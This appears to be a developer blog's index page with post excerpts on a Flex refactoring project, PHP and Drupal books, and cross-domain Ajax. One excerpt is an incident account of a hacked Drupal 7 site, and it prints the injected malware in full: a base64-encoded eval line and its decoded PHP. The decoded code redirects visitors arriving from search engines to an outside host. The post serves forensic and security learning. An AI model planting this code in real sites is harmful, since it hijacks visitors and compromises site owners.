User login
Stay in touch
-
-
Subscribe!
Sign Up! Never miss an article again -
See my resume
I'm sure I can help you -
Follow-me
See what's in my mind
PHP
Refactoring a Flex project with Mate, ZendAMF and MVC
Sometimes, software development projects do not go as we want...
Here, maybe frightened by technical issues, we first set out to solve the technical requirements, while setting aside the design phase.
It was to trigger a flash game via a push button that writes to the serial port.
But the flash player does not have access to low-level devices, so we built a bridge between the os and Flex, with a small Java program that relays messages from the serial port to a TCP socket.
The problem was that once these uncertainties removed, we directly begun development, without a true model of the application.
Big mistake!
If one day you are offered such a deal, get out!
For me I stayed, and now 2 years have gone...
Of course, we recently had to deliver the product to the customer, and thus we were compelled to refactor the code to produce something that is up to the Tanukis web-studio quality requirement...
This is not the game code, but the Air application that configures it. Obviously, being a commercial project, I could not deliver the sources.
Here we go, 10 days Tanukis refactoring crash-course!
Securing my Ubuntu Drupal install
Recently, my Drupal 7 has been compromised: most PHP files in /sites/all (the directory where Drupal store user modules and themes) have been modified and fed with that string:
eval(base64_decode("ZXJyb3JfcmVwb3J0aW5nKDApOwogJHFhenBsbT1oZWFkZXJzX3NlbnQoKTsKaWYgKCEkcWF6cGxtKXsKICRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsKJHVhZz0kX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ107CiBpZiAoJHVhZykgewppZiAoc3RyaXN0cigkcmVmZXJlciwieWFuZGV4Iikgb3Igc3RyaXN0cigkcmVmZXJlciwieWFob28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJnb29nbGUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaW5nIikgb3Igc3RyaXN0cigkcmVmZXJlciwicmFtYmxlciIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImdvZ28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJsaXZlLmNvbSIpb3Igc3RyaXN0cigkcmVmZXJlciwiYXBvcnQiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJuaWdtYSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIndlYmFsdGEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiYWlkdS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJkb3VibGVjbGljay5uZXQiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiZWd1bi5ydSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInN0dW1ibGV1cG9uLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpdC5seSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInRpbnl1cmwuY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiY2xpY2tiYW5rLm5ldCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJsb2dzcG90LmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm15c3BhY2UuY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZmFjZWJvb2suY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYW9sLmNvbSIpKSB7CiBpZiAoIXN0cmlzdHIoJHJlZmVyZXIsImNhY2hlIikgb3IgIXN0cmlzdHIoJHJlZmVyZXIsImludXJsIikpewogaGVhZGVyKCJMb2NhdGlvbjogaHR0cDovL3Byc25icmsub3NhLnBsLyIpOwogZXhpdCgpOwogfQogfQp9Cgl9"));
Here is the obfuscated code:
error_reporting(0);
$qazplm=headers_sent();
if( ! $qazplm ) {
$referer=$_SERVER['HTTP_REFERER'];
$uag=$_SERVER['HTTP_USER_AGENT'];
if( $uag ) {
if( stristr( $referer,"yandex") or stristr( $referer,"yahoo" ) or stristr( $referer,"google" ) or stristr( $referer,"bing" ) or stristr( $referer,"rambler" ) or stristr( $referer,"gogo" )
or stristr( $referer,"live.com" ) or stristr( $referer,"aport" ) or stristr( $referer,"nigma" ) or stristr( $referer,"webalta" ) or stristr( $referer,"baidu.com" )
or stristr( $referer,"doubleclick.net" ) or stristr( $referer,"begun.ru" ) or stristr( $referer,"stumbleupon.com" ) or stristr( $referer,"bit.ly" ) or stristr( $referer,"tinyurl.com" )
or stristr( $referer,"clickbank.net" ) or stristr( $referer,"blogspot.com" ) or stristr( $referer,"myspace.com" ) or stristr( $referer,"facebook.com" ) or stristr( $referer,"aol.com" ) ) {
if( ! stristr( $referer,"cache" ) or ! stristr( $referer,"inurl" ) ){
header("Location: http://prsnbrk.osa.pl/");
exit();
}
}
}
}
This code test the referer, and if it holds a well known site (facebook, yahoo, google, ...), it redirects the user to http://prsnbrk.osa.pl/. But if you directly type the url, you see nothing. So, if someone search for my site on Google, it will be redirected... Viciously effective...
My 1&1 server was more a dev platform (athome-training.com ...) than a true production ready server. Security was not a priority, and violate my server had to be a pleasure ... Obviously, I did not care to properly manage my log files, making forensic analysis impossible ...
I did so a factory reset, rebuild everything from the ground, reading as much as I can, and taking notes about what I do. Here is the account of my road to security... If you see something wrong, please, comment ;)
Pro PHP Programming
Apress has just released a new book on PHP: Pro PHP Programming. Co-written by Peter MacIntyre, Brian Danchilla and Mladen Gogala, the book offers an ambitious menu:
Apress, The Definitive Guide to Drupal 7
Apress just released a sum on Drupal, writed by many important contributor to the Drupal community. More than 1000 pages, 40 chapters, 9 appendix, this book is very, very rich.
Ajax cross domain on Jersey restfull webservices
At work, at LesTanukis, I'm working on a REST web service served by the open source application server Glassfish and the REST lib Jersey. I asked myself how to query these webservices directly from a web client, ie, how to bypass the same origin policy security restrictions. Here are some notes that recounts my route.
Real-World Solutions for Developing High-Quality PHP Frameworks and Applications de Sebastian Bergmann
Sebastian Bergmann, membre important de la communauté PHP, auteur de PHPUnit, vient de sortir un bouquin tout à fait indispensable, à propos de la qualité des projets PHP.